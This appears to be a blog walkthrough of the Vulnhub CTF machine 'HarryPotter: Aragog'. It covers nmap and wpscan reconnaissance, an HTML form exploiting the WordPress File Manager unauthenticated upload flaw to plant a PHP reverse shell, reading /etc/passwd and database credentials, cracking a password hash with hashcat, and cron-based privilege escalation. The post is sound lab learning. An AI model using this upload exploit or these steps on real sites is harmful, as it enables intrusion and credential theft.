HARRYPOTTER: ARAGOG | Vulnhub Walkthrough

Let’s do another cool machine of Vulnhub from @Mansoor R

Aragog is the 1st VM of 3-box HarryPotter.

Goal : find 2 horcruxes hidden inside the machine

Lab Setup:-

Download this machine from the link and import it into the virtual box.

Let’s start with reconnaissance.

Here is the machine welcome message and the ip.

In my case IP is 192.168.1.101

Let’s start a quick scan.

┌──(root💀kali)-[~/vm/arogya]
└─# nmap 192.168.1.101
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-06 10:16 IST
Nmap scan report for 192.168.1.101
Host is up (0.00061s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

MAC Address: 08:00:27:57:94:99 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.66 seconds

In the simple scan got multiple open ports.

Here is the complete Nmap scan report

┌──(root💀kali)-[~/vm/arogya]
└─# nmap -sV -sC -A -vv -p- -oA 192.168.1.101 192.168.1.101
# Nmap 7.91 scan initiated Wed May 5 14:50:04 2021 as: nmap -sV -sC -A -vv -p- -oA 192.168.1.101 192.168.1.101
Nmap scan report for 192.168.1.101
Host is up, received arp-response (0.00073s latency).
Scanned at 2021-05-05 14:50:05 IST for 10s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 48:df:48:37:25:94:c4:74:6b:2c:62:73:bf:b4:9f:a9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDSJJ1ZAbIA3lP2RbpxnhknzLJqrHne4be3xTLmVEXWg7YQ6FFZ/RA1VzmrFYPlvB1t1XwopptI+nA9BSG5+hllLyCQ1pDZkhIwyGHuBLZETD8cIJTlsxVCwnh67h7eeK4hTEtjp1rUodK30juDf5u7JnkwVfo78LvM8WV1LjVrmhsZiqzy1CxAoMFpiRp3ZlvpblL3gdd0wgSNrGqEwc6qJc6Z+RKGkLbnpgTnOsc6vGLs1xFOGrHF2qFeDpUWti0ZDSN31LtP1HtNItbBKSECcFD3KrN8nPaZCa2V9GA1jrpOOAF1j0ehcRlBoFqLZzQbO9RFeIkgqGNrz3PDt7vp
| 256 1e:34:18:17:5e:17:95:8f:70:2f:80:a6:d5:b4:17:3e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBESZsj5u/F88CLIXTeBD8OgiCM2u8sKBgbvvjKccwFmCBMh3GmOHGP8qzzQwVTMkq1aN0WSIk7h8/cHCT2tZLzE=
| 256 3e:79:5f:55:55:3b:12:75:96:b4:3e:e3:83:7a:54:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMsH4OtBIy/He42Rc6KvtI6w2855JMLVloVFy5/0Rtj4
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:57:94:99 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=5/5%OT=22%CT=1%CU=37181%PV=Y%DS=1%DC=D%G=Y%M=080027%TM
OS:=6092634F%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S

In port 80 got Harry Potter image.

So i run the gobuster for directory scanning and got one blog directory

And in the /blog wordpress is running.

So i move towards to scan wordpress.

┌──(root💀kali)-[~/vm/arogya]
└─# wpscan --url http://192.168.1.101/blog/ --enumerate ap --plugins-detection aggressive --plugins-version-detection aggressive

After running wpscan got only 2 plugins in which one is default, So i move forward with the another plugin.

And i got this thing.

Plugin is vulnerable to File Manager 6.0–6.9 — Unauthenticated Arbitrary File Upload leading to RCE.

https://www.exploit-db.com/exploits/49178

https://wpscan.com/vulnerability/10389

So i created a simple HTML page and upload a payload from that file.

<html><body><form method="POST" enctype="multipart/form-data" action="http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"><input type="hidden" name="cmd" value="upload"/><input type="hidden" name="target" value="l1_Lw"/><input type="file" name="upload[]"/><br/><br/><input type="submit" value="Upload"/></form></body>
File : /blog/wp-content/plugins/wp-file-manager/lib/php/../files/php-reverse-shell.php

Now after calling it via browser got a reverse shell

Now next part is to check the user.

I found 2 user entry in /etc/passwd

gi**y:x:1001:1001::/home/XXXX:/bin/sh
ha****98:x:1000:1000:XXXX,,,:/home/XXXX:/bin/bash

Becuase Wordpress is running so i move forward to find the database credentials.

After enumerating got wordpress credentials file.

<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'my******ss');
define('DB_HOST', 'localhost');
define('DB_COLLATE', 'utf8_general_ci');
define('WP_CONTENT_DIR', '/xxxxx/xxxxx/xxxx/xxxx');
?>

In the databse got one hash

hagrid98:$P$BY**************JDHtc.

So i used hashcat to crack the hash

┌──(root💀kali)-[~/vm/arogya]
└─# hashcat -O -a 0 -m 400 hash /usr/share/wordlists/rockyou.txt -o result.txt

So i got the password of ha****98

Got the first bash64 encrypted flag.

horcrux_{RiXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXets}

Privilege escalation is little bit tricky.

After searching got nothing so i move towards to monitor the running cron jobs.

I used pspy to monitor running cron job.

After monitoring some commands got someting intrestings so i payed attention on it.

So i added a reverse shell command on it and start a listner on other side.

Once the file executed then will get shell.

Now i Got the Second bash64 encrypted flag.

horcrux_{maXXXXXXXXXXXXXXXXXXXXXXXXXXXXXOre}

Hurray !!!

All is fine but the Privilege escalation part is little bit challenging,

All you need to do is keep focusing on the running services and monitor each of them.

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Threat Intelligence: Technical Know How

{UPDATE} ROMANCE OF THE THREE KINGDOMS?2 Hack Free Resources Generator

What is Digital Trust?

MASQ NFT & Staking Complete

{UPDATE} Rento - Online Dice Board Game Hack Free Resources Generator

Merlin — $200,000 USDT Bounty Reward Program

{UPDATE} Halloween-noita ja velho Hack Free Resources Generator

Proving Grounds Craft walkthrough

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Rahul

Rahul

More from Medium

HTB Return Machine Walkthrough.

VulnHub PumkinGarden CTF Walkthrough

Try Hack Me Gaming Server

Vulnhub: Lampião (Walkthrough)